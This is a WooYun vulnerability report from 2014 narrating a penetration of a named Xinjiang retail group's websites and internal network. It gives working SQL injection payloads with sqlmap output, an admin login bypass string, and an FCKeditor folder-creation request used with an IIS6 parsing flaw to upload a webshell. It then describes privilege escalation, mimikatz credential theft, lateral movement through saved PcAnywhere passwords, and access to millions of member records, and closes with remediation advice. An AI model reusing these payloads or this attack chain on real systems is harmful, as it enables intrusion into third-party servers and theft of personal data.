新疆某集团一次内网简单渗透测试 | wooyun-2014-051145| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-051145

漏洞标题：新疆某集团一次内网简单渗透测试

漏洞作者： Kuuki

提交时间：2014-02-17 09:40

修复时间：2014-04-03 09:41

公开时间：2014-04-03 09:41

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-17：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-04-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

集团旗下拥有美美友好百货奢侈品购物中心，天山百货大楼精品品牌店，友好商场大众品牌店，南疆库尔勒天百购物中心，阿克苏天百国际购物中心，北疆独山子金盛时尚店、伊犁天百国际购物中心，奎屯友好时尚购物中心等，友好集团超市公司已拥有26家标准化超市，包括大卖场、标超、社区便利店等多种形式。

详细说明：

http://www.xjyh.com.cn/ 集团官网

http://jt.xjyh.com/xjyh2009/Search.jsp 分站注入点
注入类型：搜索型盲注 
Place: POST
Parameter: Key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: KeyType=0&NewsType=0&Key=1%' AND 8590=8590 AND '%'='&Action=Search&Submit.x=21&Submit.y=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: KeyType=0&NewsType=0&Key=1%' AND 1843=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(73)||CHR(103)||CHR(85),5) AND '%'='&Action=Search&Submit.x=21&Submit.y=
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Is DBA : True
available databases [18]:
[*] CSSCM
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XJYH2009
[*] YHJTSCM

由于是搜索型盲注又慢又耗资源...遂一边跑一遍寻找其他方式
接着点进一个购物站www.y***o.com
好奇葩..基本有sql的地方就有注入...随便找个注入点

http://www.y***o.com/tradeitem.aspx?spid=100679652 
---
Place: GET
Parameter: spid
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: spid=100679652 AND 1367=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(104)||CHR(122)||CHR(58)||(SELECT (CASE WHEN (1367=1367) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(104)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: spid=100679652 AND 4011=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(68)||CHR(122)||CHR(67),5)
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [25]:
[*] B2C_USER
[*] BFAPP8
[*] BFBHDD8
[*] BFPUB8
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRANUSER
[*] TSMSYS
[*] WMSYS
[*] XDB

跑了一下跑出来许多表，由于表名都是汉字拼音的形式一时没找到管理员表
于是先找后台发现直接万能密码就能登陆

http://www.y***o.com/Manage/  
'or '1'='1

登陆进去发现自带的图片上传程序进行了过滤和重命名无法利用
接着在后台又发现编辑器是fckeditor 2.6.4

http://img.y***o.com/fckserver/fckeditor/editor/filemanager/connectors/test.html

那就建立文件夹，利用IIS6的解析漏洞成功上传asp马。

建立文件夹的命令，用上面编辑器建立.会变成_
http://img.y***o.com/fckserver/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z

不能执行命令，再上传一个aspx马。。
发现服务器几乎什么补丁都没打。。。果断pr.exe提权加账户开3389

然后反弹3389到本机连之
上去传了个mimikatz抓管理密码。。。然后切到administrator帐号
成功拿到图片服务器权限
3389一切到administrator发现...竟然有PcAnywhere 而且保存了各个服务器密码...

几个服务器都连过去看看...有的甚至还开着sql调试器...看来我们的程序员哥哥也是辛苦奋战到春节前

接着逛了几圈对内网状况大致有了了解
用画图板搞一张建议拓扑图...

至此用PcAnywhere连着的win服务器（除了数据库服务器，因为是linux没保存密码，用本机管理员密码试也没有登录成功）全部沦陷...
内网主机粗略看了下还挺多，本来想弹个代理出来继续渗透...结果一时没找到合适的程序又不想安装软件搞大动作..就作罢了，能看到的东西也不算少，就点到为止。

漏洞证明：

B2Cweb服务器1

B2Cweb服务器2

食堂计费服务器...咦职工食堂好像就在家对面- -

哇...好贵...

在web服务器1发现数据库密码，通过菜刀连之
S_HYK_HYXX表 221万会员卡数据？（用朋友的会员卡号找好像没找到）
S_USER_1表 31W数据
ZHF_HYXX表 27W数据
貌似还有一些实体柜台的商品价格之类的表，不确定和销售终端是否联网

在计费服务器还从浏览记录里面发现了别的服务器的共享

就这么多啦

修复方案：

提几个修复建议吧
1.过滤sql注入...实在不行换套系统吧，这个B2C系统登陆进去竟然在欢迎的地方直接显示我的明文密码...
2.升级IIS，彻底杜绝解析漏洞
3.加强安全意识，PcAnywhere这种东西过时的东西就不要用了，就算用也好歹不要保存密码
4.关闭服务器之间的共享...
5.防火墙策略，只能从因特网访问内部，从内网访问外部最好过滤
6.如果服务器的数据重要，最好定期做安全测评，可以找我或者咱们乌云的众测嘛，嘿嘿
还有问题可以联系我

版权声明：转载请注明来源 Kuuki@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞